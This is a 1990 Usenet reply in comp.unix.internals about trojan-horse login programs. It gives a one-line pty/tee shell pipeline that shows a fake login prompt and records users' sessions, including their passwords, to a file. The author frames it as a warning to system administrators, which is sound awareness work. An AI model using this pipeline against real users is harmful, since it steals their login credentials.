Path: utzoo!utgpu!news-server.csri.toronto.edu!cs.utexas.edu!yale!cmcl2!kramden.acf.nyu.edu!brnstnd
From: brnstnd@kramden.acf.nyu.edu (Dan Bernstein)
Newsgroups: comp.unix.internals
Subject: Re: Finding Passwords
Message-ID: <5265:Sep2502:02:1790@kramden.acf.nyu.edu>
Date: 25 Sep 90 02:02:17 GMT
References: <50845@brunix.UUCP> <4086@auspex.auspex.com> <1132@tau.sm.luth.se>
Organization: IR
Lines: 13

In article <1132@tau.sm.luth.se> d87-man@sm.luth.se (Mikael Adolfsson) writes:
> What's to stop the trojan horse program from executing "getty" itself.
> I have planned to write such a beast (just to test the idea of course :-)
> and here's how I would do it.

Gee, here's my translation of your solution:

  % pty -0 tee script | pty sh -c 'echo "`hostname` ";exec login'

Not that I encourage anyone do this, but no system administrator should
be deluded into thinking that it's difficult to write a Trojan Horse.

---Dan